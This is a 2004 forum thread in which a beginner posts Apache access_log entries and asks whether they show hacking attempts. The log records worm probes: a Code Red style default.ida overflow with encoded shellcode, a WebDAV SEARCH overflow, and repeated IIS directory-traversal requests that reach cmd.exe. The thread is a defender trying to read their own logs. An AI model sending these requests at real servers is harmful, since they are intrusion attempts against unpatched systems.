Access_log - help!!!????

vincenzobar

Verified User
Joined
Aug 15, 2004
Messages
92
I am getting whats below in my access_log.1 I am not good at reading logs yet (i am a newbie) so can someone help me a little.

I noticed the call for windows command prompt and other weird things. Is this port scanning and hacker attempts. If so what should i do?

Code:
69.46.204.42 - - [08/Aug/2004:09:46:26 -0400] "SEARCH /\x90\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\x02\xb1\…………. 

69.136.130.155 - - [08/Aug/2004:22:40:29 -0400] "GET /default.ida?XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u6858%ucbd3%u7801%u9090%u9090%u8190%u00c3%u0003%u8b00%u531b%u53ff%u0078%u0000%u00=a HTTP/1.0" 404 - "-" "-"
@
@
@
@
@
………

196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:45 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"
196.30.250.87 - - [09/Aug/2004:19:33:46 -0400] "GET /scripts/..%255c%255c../winnt/system32/cmd.exe?/c+dir" 404 - "-" "-"

66.78.26.26 - - [10/Aug/2004:02:12:03 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:04 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:07 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
66.78.26.26 - - [10/Aug/2004:02:12:07 -0400] "GET /sumthin HTTP/1.0" 404 - "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 373 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 377 "-" "-"
218.153.102.28 - - [10/Aug/2004:02:22:16 -0400] "GET / HTTP/1.1" 400 388 "-" "-"
@


Thanks in advance!
 
Thanks for the link very informative!!!!!

that microsoft redirect was funny as hell i thought!!!!

Well i guess i just take it and like it... damn worms!

one last questions which files should i be looking at most closely for hacker attempts and success?

thanks for the response!

-vin
 
Back
Top